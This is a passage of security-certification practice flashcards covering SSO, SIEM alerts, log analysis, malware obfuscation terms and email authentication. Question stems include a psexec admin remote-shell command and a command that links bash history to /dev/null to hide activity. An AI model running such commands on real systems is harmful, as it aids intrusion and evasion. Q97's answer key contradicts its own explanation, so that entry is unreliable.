All of these are examples of single sign‐on (SSO) implementations. They allow a user to use a single set of credentials to log in to multiple different services and applications. When federated, SSO can also allow a single account to work across a variety of services from multiple organizations.

Question 49

63- Naomi wants to enforce her organization’s security policies on cloud service users. What technology is best suited to this?

• OAuth
• CASB
• OpenID
• DMARC

Answer 49

CASB

A cloud access security broker (CASB) can perform actions such as monitoring activity, managing cloud security policies for SaaS services, enforcing security policies, logging, alerting, and in‐line policy enforcement when deployed with agents on endpoint devices or as a proxy.

Question 50

64- Elliott wants to encrypt data sent between his servers. What protocol is most commonly used for secure web communications over a network?

• TLS
• SSL
• IPsec
• PPTP

Answer 50

TLS

Transport Layer Security (TLS) is used to secure web and other types of traffic. Many people still call TLS SSL out of habit, but TLS is actually a different protocol and has replaced Secure Sockets Layer (SSL). IPsec is an encryption protocol used for VPNs and other point‐to‐point connections between networks. Point‐to‐Point Tunneling Protocol (PPTP) has a number of security issues.

Question 51

66- What term is used to describe defenses that obfuscate the attack surface of an organization by deploying decoys and attractive targets to slow down or distract an attacker?

• An active defense
• A honeyjar
• A bear trap
• An interactive defense

Answer 51

An active defense

Active defenses are aimed at slowing down attackers while using their resources. The rest of the terms listed here were made up for this question. Active defenses are sometimes referred to as deception technology.

Question 52

69- What type of access is typically required to compromise a physically isolated and air‐gapped system?

• Wired network access
• Physical access
• Wireless network access
• None of the above, because an isolated, air‐gapped system cannot be accessed

Answer 52

Physical access

Physical access is the best (and often only) way to compromise an air‐gapped, physically isolated system. Although some esoteric attack methods can gather information via RF, acoustic, or other leakage, real‐world scenarios will require physical access in almost all cases.

Question 53

71- Which of the following parties directly communicate with the end user during a SAML transaction?

• The relying party
• The SAML identity provider
• Both the relying party and the identity provider
• Neither the relying party nor the identity provider

Answer 53

Both the relying party and the identity provider

In a SAML transaction, the user initiates a request to the relying party, who then redirects the user to the SSO provider. The user then authenticates to the SAML identity provider and receives a SAML response, which is sent to the relying party as proof of identity.

Question 54

72- Support for AES, 3DES, ECC, and SHA‐256 are all examples of what?

• Encryption algorithms
• Hashing algorithms
• Processor security extensions
• Bus encryption modules

Answer 54

Processor security extensions

These are all examples of processor security extensions providing additional cryptographic instructions. Since AES, 3DES, and ECC are all encryption algorithms and SHA‐256 is a hashing algorithm, we know that this can’t be either of the first two options alone. Bus encryption may use these, but they aren’t just examples of bus encryption algorithms.

Question 55

73- Which of the following is not a benefit of physical segmentation?

• Easier visibility into traffic
• Improved network security
• Reduced cost
• Increased performance

Answer 55

Reduced cost

Although physical segmentation can make it easier to see specific traffic while providing better network security and increased performance, running a separate infrastructure is rarely a less expensive option.

Question 56

75- Which of the following is not a common use case for network segmentation?

• Creating a VoIP network
• Creating a shared network
• Creating a guest wireless network
• Creating trust zones

Answer 56

Creating a shared network

Segmented networks are almost always used to isolate groups rather than to combine them. Common uses include specific network segments for VoIP, wireless, or specific trust zones and levels.

Question 57

76- What three layers make up a software‐defined network?

• Application, Datagram, and Physical layers
• Application, Control, and Infrastructure layers
• Control, Infrastructure, and Session layers
• Data link, Presentation, and Transport layers

Answer 57

Application, Control, and Infrastructure layers

Software‐defined networks (SDNs) consist of three major layers: the application layer, where information about the network is used to improve flow, configuration, and other items; the control layer, which is where the logic from SDN controllers control the network infrastructure; and the infrastructure layer, which is made up of the networking equipment. If you’re not deeply familiar with SDNs, you can address questions like this by reviewing what you do know. The other three options contain elements of the OSI model but don’t make sense in the context of SDN.

Question 58

77- Micah is designing a containerized application security environment and wants to ensure that the container images he is deploying do not introduce security issues due to vulnerable applications. What can he integrate into the CI/CD pipeline to help prevent this?

• Automated checking of application hashes against known good versions
• Automated vulnerability scanning
• Automated fuzz testing
• Automated updates

Answer 58

Automated vulnerability scanning

If Micah implements automated vulnerability scanning, he can check to see if the applications that are about to be deployed have known vulnerabilities. Automated patching will also help with this, but will only apply available patches and will not assess whether there are configuration vulnerabilities or unpatched vulnerabilities. Fuzz testing can help to test if the applications have issues with unexpected input but will not address most vulnerabilities, and hashing will only tell him if he is running the version of code that he expects to, not if it is vulnerable.

Question 59

78- Camille wants to integrate with a federation. What will she need to authenticate her users to the federation?

• An IDP
• A SP
• An API gateway
• An SSO server

Answer 59

An IDP

Camille will need to integrate her identity provider (IDP) to provide authentication and authorization. Once users are authenticated, they can use various service providers throughout the federation. She will also probably want to use some form of single sign‐on (SSO) service, but it is not required to be part of a federation.

Question 60

79- Answer the question based on your knowledge of container security and the following scenario.

Brandon has been tasked with designing the security model for container use in his organization. He is working from the NIST SP 800‐190 document and wants to follow NIST recommendations wherever possible.

Brandon needs to deploy containers with different purposes, data sensitivity levels, and threat postures to his container environment. How should he group them?

• Segment containers by purpose
• Segment containers by data sensitivity
• Segment containers by threat model
• All of the above

Answer 60

All of the above

Where possible, NIST recommends segmenting by purpose, data sensitivity, and threat model to separate OS kernels.

Question 61

NIST SP 800-190

Answer 61

This publication explains the potential security concerns associated with the use of containers and provides recommendations for addressing these concerns.

Question 62

80- Answer the question based on your knowledge of container security and the following scenario.

Brandon has been tasked with designing the security model for container use in his organization. He is working from the NIST SP 800‐190 document and wants to follow NIST recommendations wherever possible.

What issues should Brandon consider before choosing to use the vulnerability management tools he has in his non‐container‐based security environment?

• Vulnerability management tools may make assumptions about host durability.
• Vulnerability management tools may make assumptions about update mechanisms and frequencies.
• Both A and B.
• Neither A nor B.

Answer 62

Both A and B.

The NIST 800‐190 guidelines note that traditional vulnerability management tools may make assumptions like those in options A and B regarding the systems and applications they are scanning. Since containers are ephemeral and may be updated and changed very frequently, a traditional vulnerability scanning and management approach is likely to be a poor fit for a containerized environment.

Question 63

81- What key functionality do enterprise privileged account management tools provide?

• Password creation
• Access control to individual systems
• Entitlement management across multiple systems
• Account expiration tools

Answer 63

Entitlement management across multiple systems

The most distinctive feature of privileged account management tools for enterprise use is the ability to manage entitlements across multiple systems throughout an enterprise IT environment. Broader identity and access management systems for enterprises provide user account management and life‐cycle services, including account expiration tools and password life‐cycle management capabilities.

Question 64

82- Amira wants to deploy an open standard–based single sign‐on (SSO) tool that supports both authentication and authorization. What open standard should she look for if she wants to federate with a broad variety of identity providers and service providers?

• LDAP
• SAML
• OAuth
• OpenID Connect

Answer 64

SAML

SAML provides all of the capabilities Amira is looking for. Unlike SAML, OAuth is an authorization standard, not an authentication standard. LDAP provides a director and can be used for authentication but would need additional tools to be used as described. Finally, OpenID Connect is an authentication layer on top of OAuth, which is an authorization framework. Together, they would also meet the needs described here, but individually they do not.

Question 65

83- Adam is testing code written for a client‐server application that handles financial information and notes that traffic is sent between the client and server via TCP port 80. What should he check next?

• If the server stores data in unencrypted form
• If the traffic is unencrypted
• If the systems are on the same network
• If usernames and passwords are sent as part of the traffic

Answer 65

If the traffic is unencrypted

Adam knows that TCP/80 is the normal port for unencrypted HTTP traffic. As soon as he sees the traffic, he should immediately check if the traffic is unencrypted. If it is, his first recommendation will likely be to switch to TLS encrypted traffic. Once that is complete, he can worry about whether data is encrypted at rest and if usernames and passwords are passed as part of the traffic, which might be acceptable if it was protected with TLS!

Question 66

85- Elaine’s team has deployed an application to a cloud‐hosted serverless environment. Which of the following security tools can she use in that environment?

Endpoint antivirus
Endpoint DLP
IDS for the serverless environment
None of the above

Answer 66

None of the above

Serverless environments are a shared service, and since there is not a system that is accessible to consumers, there is nowhere to install endpoint tools. Similarly, network IPSs cannot be placed in front of a shared resource. Elaine should also be aware that any flaw with the underlying serverless environment will likely impact all of the service hosting systems.

Question 67

86- Lucca needs to explain the benefits of network segmentation to the leadership of his organization. Which of the following is not a common benefit of segmentation?

• Decreasing the attack surface
• Increasing the number of systems in a network segment
• Limiting the scope of regulatory compliance efforts
• Increasing availability in the case of an issue or attack

Answer 67

Increasing the number of systems in a network segment

Segmentation is typically used to decrease the number of systems in a network segment, rather than to increase it. Segmentation is often used to decrease an organization’s attack surface by moving systems that don’t need to be exposed to a protected segment. It can also be used to limit compliance impact by removing systems from a compliance zone that do not need to be part of it. Finally, limiting the number of systems or devices in segment or keeping potentially problematic systems in an isolated network segment can help increase availability.

Question 68

88- Nathan is designing the logging infrastructure for his company and wants to ensure that a compromise of a system will not result in the loss of that system’s logs. What should he do to protect the logs?

• Limit log access to administrators.
• Encrypt the logs.
• Rename the log files from their common name.
• Send the logs to a remote server.

Answer 68

Send the logs to a remote server.

Nathan’s best option is to send the logs to a remote server. The server should be protected to ensure that the same exploits that might compromise other systems will not impact the secure log storage server or service. In many organizations, a SIEM device or security logging tool like ELK or Splunk may be used to store and work with these logs.

Question 69

89- Ansel knows he wants to use federated identities in a project he is working on. Which of the following should not be among his choices for a federated identity protocol?

• OpenID
• SAML
• OAuth
• Authman

Answer 69

Authman

OpenID, SAML, and OAuth are all commonly used protocols for federated identity. Ansel will need to better understand what the use cases for federated identity are in his environment and which organizations he will federate with before he chooses a protocol to implement and may eventually need to support more than one. Authman is a tool used to manage web user login files and is not a protocol.

Question 70

90- James uploads a file that he believes is potentially a malware package to VirusTotal and receives positive results, but the file is identified with multiple different malware package names. What has most likely occurred?

• The malware is polymorphic and is being identified as multiple viruses because it is changing.
• Different antimalware engines call the same malware package by different names.
• VirusTotal has likely misidentified the malware package, and this is a false positive.
• The malware contains multiple malware packages, resulting in the matches.

Answer 70

Different antimalware engines call the same malware package by different names.

Sites like VirusTotal run multiple antimalware engines, which may use different names for malware packages. This can result in a malware package apparently matching multiple different infections.

Question 71

92- Abul wants to identify typical behavior on a Windows system using a built‐in tool to understand memory, CPU, and disk utilization. What tool can he use to see both real‐time performance and over a period of time?

• sysmon
• sysgraph
• resmon
• resgraph

Answer 71

resmon

The Windows Resource Monitor (resmon.exe) application is a useful tool to both see real‐time data and graph it over time, allowing Abul to watch for spikes and drops in usage that may indicate abnormal behavior.s

Question 72

93- The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for?

• Calculating minimum viable signature length
• Binary fingerprinting to identify the malware author
• Building a similarity graph of similar functions across binaries
• Heuristic code analysis of development techniques

Answer 72

Building a similarity graph of similar functions across binaries

Binary diffing looks at multiple potentially related binaries that have anti‐reverse‐engineering tools run on them and looks for similarities. Graphs map this data, helping the tool identify malware families despite the protections that malware authors bake in. As you might have guessed, the rest of the answers for this question were made up.

Question 73

94- What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user’s workstation?

• A scripted application installation
• Remote execution of code
• A scripted application uninstallation
• A zero‐day attack

Answer 73

Remote execution of code

PowerShell, wmic, and winrm.vbs are all commonly used for remote execution of code or scripts, and finding them in use on a typical workstation should cause you to be worried as most users will never use any of the three.

Question 74

96- Lucy is an SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.

While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization’s New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time?

• Heuristic
• Behavior
• Availability
• Anomaly

Answer 74

Availability

Availability analysis targets whether a system or service is working as expected. Although a SIEM may not have direct availability analysis capabilities, reporting on when logs or other data is not received from source systems can help detect outages. Ideally, Lucy’s organization should be using a system monitoring tool that can alarm on availability issues as well as common system problems such as excessive memory, network, disk, or CPU usage.

Question 75

98- Lucy is an SOC operator for her organization and is responsible for monitoring her organization’s SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently.

Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this?

• Trend
• Availability
• Heuristic
• Behavior

Answer 75

Behavior

Lucy has configured a behavior‐based detection. It is likely that a reasonable percentage of the detections will be legitimate travel for users who typically do not leave the country, but pairing this behavioral detection with other behavioral or anomaly detections can help determine if the login is legitimate.

Question 76

100- Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing?

• A NetBIOS file share
• A RADIUS connection
• An RDP connection
• A Kerberos connection

Answer 76

An RDP connection

RDP operates over TCP 3389. Most corporate workstations won’t have RDP turned on inbound to workstations, and Suki may find that she has discovered a compromise or other behavior that her organization may not want to occur.

Question 77

101- Ian wants to capture information about privilege escalation attacks on a Linux system. If he believes that an insider is going to exploit a flaw that allows them to use sudo to assume root privileges, where is he most likely to find log information about what occurred?

• The sudoers file
• /var/log/sudo
• /var/log/auth.log
• Root’s .bash_log

Answer 77

/var/log/auth.log

The auth.log file on Linux systems will capture sudo events. A knowledgeable attacker is likely to erase or modify the auth.log file, so Ian should make sure that the system is sending these events via syslog to a trusted secure host. The sudoers file stored in /etc/sudoers contains details of which users can use sudo and what rights they have. There is not a file called /var/log/sudo, and root’s .bash_log file might contain commands that root has run but won’t have details of the sudo event—there’s no reason for root to sudo to root!

Question 78

102- What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory?

• How often the directory is accessed
• If files in the directory have changed
• If sensitive data was copied out of the directory
• Who has viewed files in the directory

Answer 78

If files in the directory have changed

Tripwire can monitor files and directories for changes, which means Gabby can use it to monitor for files in a directory that have changed. It will not tell you how often the directory is accessed, who viewed files, or if sensitive data was copied out of the directory.

Question 79

103- While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?

psexec \10.0.11.1 -u Administrator -p examplepw cmd.exe

• The user has opened a command prompt on their workstation.
• The user has opened a command prompt on the desktop of a remote workstation.
• The user has opened an interactive command prompt as administrator on a remote workstation.
• The user has opened a command prompt on their workstation as Administrator.

Answer 79

The user has opened an interactive command prompt as administrator on a remote workstation.

Even if you’re not familiar with the PS tools, you can use your knowledge of Windows command‐line tools to figure out what is happening here. We see a remote workstation (it is highly unlikely you would connect to your own workstation this way!) indicated by the \ip.address, a -u flag likely to mean user ID with the administrator listed, and a -p for password. We know that cmd.exe is the Windows command prompt, so it is reasonable and correct to assume that this will open a remote command prompt for interactive use. If this is a user who isn’t an administrator, Charlene needs to start an incident investigation right away.

Question 80

105- While reviewing Windows event logs for a Windows system with reported odd behavior, Kai discovers that the system she is reviewing shows Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?

• The system was shut down.
• Another antivirus program has interfered with the scan.
• The user disabled the scan.
• The scan found a file it was unable to scan.

Answer 80

Another antivirus program has interfered with the scan.

First, Kai should check the scan log to review the scan type and error code to check it via the Microsoft support site. The most likely cause from the list of provided answers is a conflict with another security product. While security practitioners often worry about malware on systems, a common cause of scan failures is a second installed antivirus package. If Kai doesn’t find a second antivirus package installed, she should conduct a scan using another tool to see if malware may be the issue.

Question 81

106- Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices?

• Blocklisting
• IP reputation
• Allowlisting
• Domain reputation

Answer 81

Allowlisting

Blocklisting known bad IP addresses (previously known as blacklisting), as well as the use of both domain and IP reputation services, can help Charles accomplish his task. Allowlisting (previously known as whitelisting) allows only known addresses through and does not flag known bad addresses.

Question 82

108- While reviewing email headers, Saanvi notices an entry that reads as follows:

From: “John Smith, CIO” jsmith@example.com with a Received: parameter that shows mail.demo.com [10.74.19.11].
Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?

• John Smith’s email was forwarded by someone at demo.com.
• John Smith’s email was sent to someone at demo.com.
• The headers were forged to make it appear to have come from John Smith.
• The mail.demo.com server is a trusted email forwarding partner for example.com.

Answer 82

The headers were forged to make it appear to have come from John Smith.

The most likely scenario in this circumstance is that the headers were forged to make the email appear to come from example.com, but the email was actually sent from mail.demo.com.

Question 83

109- Fiona wants to prevent email impersonation of individuals inside her company. What technology can best help prevent this?

• IMAP
• SPF
• DKIM
• DMARC

Answer 83

DMARC

While SPF and DKIM can help, combining them in the form of DMARC can limit trusted senders to only a known list and prove that the domain is the domain that is sending the email; this prevents email impersonation when other organizations also use DMARC.

Question 84

111- Ian wants to leverage multiple threat flows and is frustrated that they come in different formats. What type of tool might best assist him in combining this information and using it to further streamline his operations?

• IPS
• OCSP
• SOAR
• SAML

Answer 84

SOAR

Security orchestration, automation, and response (SOAR) systems are designed to correlate information and may be able to combine this information. This is especially true if the system and feeds make use of the Structured Threat Information Expression language (STIX) and TAXII, the protocol used to transfer threat intelligence. STIX and TAXII are open protocols that have been adopted to allow multiple threat sources to be combined effectively. SAML is Security Assertion Markup Language, and OCSP is Online Certificate Status Protocol. Neither of those is useful in processing threat information.

Question 85

OCSP

Answer 85

Online Certificate Status Protocol

an internet protocol that allows applications to check the revocation status of a digital certificate in real-time, essentially verifying if a certificate is still valid or has been revoked by the issuing authority, providing a more up-to-date status compared to traditional Certificate Revocation Lists

Question 86

SPF

Answer 86

**Sender Policy Framework ** (SPF) is an email authentication technique that allows organizations to publish a list of their authorized email servers, and systems not listed in SPF will be rejected

Question 87

DKIM

Answer 87

DomainKeys Identified Mail (DKIM) allows organizations to add content to messages to identify them as being from their domain by signing both the body of the message and elements of the header, helping to ensure that the message is actually from the organization it claims to be from

Question 88

DMARC

Answer 88

Domain-based Message Authentication, Reporting, and Conformance (DMARC) is a protocol that uses SPF and DKIM to determine whether an email message is authentic, allowing you to choose to reject or quarantine messages that are not sent by a DMARC-supporting sender

Question 89

port 1521

Answer 89

Oracle databases default to TCP port 1521

Question 90

113- During a log review, Mei sees repeated firewall entries, as shown here:

Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by
access-group “OUTSIDE” [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group “OUTSIDE” [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group “OUTSIDE” [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group “OUTSIDE” [0x5063b82f, 0x0]
What service is the remote system most likely attempting to access?

• H.323
• SNMP
• MS‐SQL
• Oracle

Answer 90

Oracle

Oracle databases default to TCP port 1521. Traffic from the “outside” system is being denied when it attempts to access an internal system via that port.

Question 91

While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code?

• A packer
• A crypter
• A shuffler
• A protector

Answer 91

A shuffler

Packers, or runtime packers, are tools that self‐extract when run, making the code harder to reverse‐engineer. Crypters may use actual encryption or simply obfuscate the code, making it harder to interpret or read. Protectors are software that is intended to prevent reverse engineering and often include packing and encryption techniques as well as other protective technologies. Shufflers were made up for this question.

Question 92

Packer

Answer 92

ackers, or runtime packers, are tools that self‐extract when run, making the code harder to reverse‐engineer.

Question 93

Crypter

Answer 93

Crypters may use actual encryption or simply obfuscate the code, making it harder to interpret or read.

Question 94

Protector

Answer 94

Protectors are software that is intended to prevent reverse engineering and often include packing and encryption techniques as well as other protective technologies.

Question 95

115- While reviewing Apache logs, Nara sees the following entries as well as hundreds of others from the same source IP address. What should Nara report has occurred?

[ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 “GET /scripts/sample.php” “-“ 302 336 0
[ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 “GET /scripts/test.php” “-“ 302 336 0
[ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 “GET /scripts/manage.php” “-“ 302 336 0
[ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 “GET /scripts/download.php” “-“ 302 336 0
[ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 “GET /scripts/update.php” “-“ 302 336 0
[ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 “GET /scripts/new.php” “-“ 302 336 0

• A denial‐of‐service attack
• A vulnerability scan
• A port scan
• A directory traversal attack

Answer 95

A vulnerability scan

Testing for common sample and default files is a common tactic for vulnerability scanners. Nara can reasonably presume that her Apache web server was scanned using a vulnerability scanner.

Question 96

117- Cormac needs to lock down a Windows workstation that has recently been scanned using Nmap on a Kali Linux–based system, with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system’s firewall for externally initiated connections?

root@kali:~# nmap -sS -P0 -p 0-65535 192.168.1.14

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-25 21:08 EDT
Nmap scan report for dynamo (192.168.1.14)
Host is up (0.00023s latency).
Not shown: 65524 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
2869/tcp open icslap
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
7680/tcp open unknown
22350/tcp open CodeMeter
49677/tcp open unknown
MAC Address: BC:5F:F4:7B:4B:7D (ASRock Incorporation)

• 80, 135, 139, and 445.
• 80, 445, and 3389.
• 35, 139, and 445.
• No ports should be open.

Answer 96

No ports should be open.

The uses described for the workstation that Cormac is securing do not require inbound access to the system on any of these ports. Web browsing and Active Directory domain membership traffic can be handled by traffic initiated by the system.

Question 97

118- Frank’s team uses the following query to identify events in their threat intelligence tool. Why would this scenario be of concern to the security team?

select * from network-events where data.process.image.file = ‘cmd.exe’
AND data.process.parentImage.file != ‘explorer.exe’ AND data.process.
action = ‘launch’

• Processes other than explorer.exe typically do not launch command prompts.
• cmd.exe should never launch explorer.exe.
• explorer.exe provides administrative access to systems.
• cmd.exe runs as administrator by default when launched outside of Explorer.

Answer 97

cmd.exe should never launch explorer.exe.

For most Windows user workstations, launches of cmd.exe by programs other than Explorer are not typical. This script will identify those launches and will alarm on them.

Question 98

119- Mark writes a script to pull data from his security data repository. The script includes the following query:

select source.name, data.process.cmd, count(*) AS hostcount
from windows-events where type = ‘sysmon’ AND
data.process.action = ‘launch’ AND data.process. image.file =
‘reg.exe’ AND data.process.parentImage.file = ‘cmd.exe’
He then queries the returned data using the following script:

select source.name, data.process.cmd, count(*) AS hostcount
from network-events where type = ‘sysmon’ AND
data.process.action = ‘launch’ AND data.process. image.file =
‘cmd.exe’ AND data.process.parentImage.file = ‘explorer.exe’
What events will Mark see?

• Uses of explorer.exe where it is launched by cmd.exe
• Registry edits launched via the command line from Explorer
• Registry edits launched via explorer.exe that modify cmd.exe
• Uses of cmd.exe where it is launched by reg.exe

Answer 98

Registry edits launched via the command line from Explorer

The first query will identify times when the reg.exe was launched by cmd.exe. If the same data is searched to correlate with launches of cmd.exe by explorer.exe, Mark will know when registry edits were launched via the command line (cmd.exe) from Explorer—a process that typically means users have edited the registry, which should be an uncommon event in most organizations and is likely to be a security concern.

Question 99

120- Mateo is responsible for hardening systems on his network, and he discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?

• Enable host firewalls.
• Install patches for those services.
• Turn off the services for each appliance.
• Place a network firewall between the devices and the rest of the network.

Answer 99

Place a network firewall between the devices and the rest of the network.

Mateo’s only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don’t have patches available, and many appliances do not allow the services they provide to be disabled or modified.

Question 100

memstat

Answer 100

used to check the state of memcached server

Question 101

top

Answer 101

command will show a dynamic, real‐time list of running processes

Question 102

125- While reviewing output from the netstat command, John sees the following output. What should his next action be?

[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED

• Capture traffic to 151.101.2.69 using Wireshark.
• Initiate the organization’s incident response plan.
• Check to see if 151.101.2.69 is a valid Microsoft address.
• Ignore it; this is a false positive.

Answer 102

Initiate the organization’s incident response plan.

John has discovered a program that is both accepting connections and has an open connection, neither of which are typical for the Minesweeper game. Attackers often disguise Trojans as innocuous applications, so John should follow his organization’s incident response plan.

Question 103

EDR

Answer 103

Endpoint detection and response

Question 104

127- While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured:

ln /dev/null ~/.bash_history
What action was this user attempting to perform?

• Enabling the Bash history
• Appending the contents of /dev/null to the Bash history
• Logging all shell commands to /dev/null
• Allowing remote access from the null shell

Answer 104

Logging all shell commands to /dev/null

This command will prevent commands entered at the Bash shell prompt from being logged, as they are all sent to /dev/null. This type of action is one reason that administrative accounts are often logged to remote hosts, preventing malicious insiders or attackers who gain administrative access from hiding their tracks.

Question 105

128- Charles wants to determine whether a message he received was forwarded by analyzing the headers of the message. How can he determine this?

• Reviewing the Message‐ID to see if it has been incremented.
• Checking for the In‐Reply‐To field.
• Checking for the References field.
• You cannot determine if a message was forwarded by analyzing the headers.

Answer 105

You cannot determine if a message was forwarded by analyzing the headers.

When an email is forwarded, a new message with a new Message‐ID header will be created. The In‐Reply‐To and References field will also be set as normal. The best option that Charles has is to look for clues like a subject line that reads “FWD”—something that is easily changed.

Question 106

129- While reviewing the filesystem of a potentially compromised system, Marta sees the following output when running ls -la. What should her next action be after seeing this?

-rwxr-xr-x 1 root root 57 Mar 1 2013 paros
-rwxr-xr-x 1 root root 22256 May 13 2015 parse-edid
-rwxr-xr-x 1 root root 77248 Nov 2 2015 partx
lrwxrwxrwx 1 root root 15 Jan 28 2016 passmas -> expect_passmass
-rwsr-xr-x 1 root root 50000 Aug 5 18:23 passwd (in red)
-rwxr-xr-x 1 root root 31240 Jan 18 2016 paste
-rwxr-xr-x 1 root root 67 May 16 2013 paster
-rwxr-xr-x 1 root root 70 May 16 2013 paster2.7
-rwxr-xr-x 1 root root 14792 Nov 6 2015 pasuspender
-rwxr-xr-x 1 root root 128629 Jan 28 2016 patator
-rwxr-xr-x 1 root root 151272 Mar 7 2015 patch
lrwxrwxrwx 1 root root 3 Jan 28 2016 patchwork -> dot
-rwxr-xr-x 1 root root 31032 Dec 12 2015 patgen
-rwxr-xr-x 1 root root 31240 Jan 18 2016 pathchk
-rwxr-xr-x 1 root root 14648 Nov 6 2015 pax11publish

• Continue to search for other changes.
• Run diff against the password file.
• Immediately change her password.
• Check the passwd binary against a known good version.

Answer 106

Check the passwd binary against a known good version.

The passwd binary stands out as having recently changed. This may be innocuous, but if Marta believes the machine was compromised, there is a good chance the passwd binary has been replaced with a malicious version. She should check the binary against a known good version and then follow her incident response process if it doesn’t match.

Question 107

130- Susan wants to check a Windows system for unusual behavior. Which of the following persistence techniques is not commonly used for legitimate purposes?

• Scheduled tasks
• Service replacement
• Service creation
• Autostart registry keys

Answer 107

Service replacement

Scheduled tasks, service creation, and autostart registry keys are all commonly found on Windows systems for legitimate purposes. Replacing services is far less common unless a known upgrade or patch has occurred.

Question 108

131- Matt is reviewing a query that his team wrote for their threat‐hunting process. What will the following query warn them about?

select timeInterval(date, ‘4h’), data.login.user,
count(distinct data.login.machine.name) as machinecount from
network-events where data.winevent.EventID = 4624 having
machinecount> 1

• Users who log in more than once a day
• Users who are logged in to more than one machine within four hours
• Users who do not log in for more than four hours
• Users who do not log in to more than one machine in four hours

Answer 108

Users who are logged in to more than one machine within four hours

Even if you don’t recognize the Windows Event ID, this query provides a number of useful clues. First, it has an interval of four hours, so you know a time frame. Next, it lists data.login.user, which means you are likely querying user logins. Finally, it includes machine count and >1, so you can determine that it is looking for more than one system that has been logged in to. Taken together, this means that the query looks for users who have logged in to more than one machine within any given four‐hour period. Matt may want to tune this to a shorter time period, because false positives may result for technical support staff, but since most users won’t log in to more than one machine, this could be a very useful threat‐hunting query.

Question 109

134- Damian has discovered that systems throughout his organization have been compromised for more than a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor?

• Criminal
• Hacktivist
• APT
• Unknown

Answer 109

APT

Damian has likely encountered an advanced persistent threat (APT). They are characterized as extremely well‐resourced actors whose compromises typically have an extended dwell time and the ability to scale capabilities to counter defenders over time.

Question 110

135- While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?

root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
˃ daemon::16820:0:99999:7:::
˃ bin::16820:0:99999:7:::
˃ sys::16820:0:99999:7:::
˃ sync::16820:0:99999:7:::
˃ games::16820:0:99999:7:::
˃ man::16820:0:99999:7:::
˃ lp::16820:0:99999:7:::
˃ mail::16820:0:99999:7:::
˃ news::16820:0:99999:7:::
˃ uucp::16820:0:99999:7:::
˃ proxy::16820:0:99999:7:::
˃ www-data::16820:0:99999:7:::
˃ backup::16820:0:99999:7:::
˃ list::16820:0:99999:7:::
˃ irc:*:16820:0:99999:7:::

• The root account has been compromised.
• An account named daemon has been added.
• The shadow password file has been modified.
• /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

Answer 110

/etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

Linux and Unix systems typically keep user account information stored in /etc/passwd, and /etc/shadow contains password and account expiration information. Using diff between the two files is not a useful strategy in this scenario.

Question 111

137- Carol wants to analyze email as part of her antispam and antiphishing measures. Which of the following is least likely to show signs of phishing or other email‐based attacks?

• The email’s headers
• Embedded links in the email
• Attachments to the email
• The email signature blockus senders.

Answer 111

The email signature block

Although you may want to analyze the email signature block, it is not likely to contain information that will help you identify a phishing message, as the signature text may have been created by the attacker. It is important to note that the signature block refers to the information provided by the user at the end of an email message, not the use of a digital signature. You should analyze entire body of an email for malicious links and payloads. Header data is often checked against IP reputation databases and other checks that can help limit email from spam domains and known malicious senders.

Question 112

138- Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this?

• Removing all links in email
• Redirecting links in email to a proxy
• Scanning all email using an antimalware tool
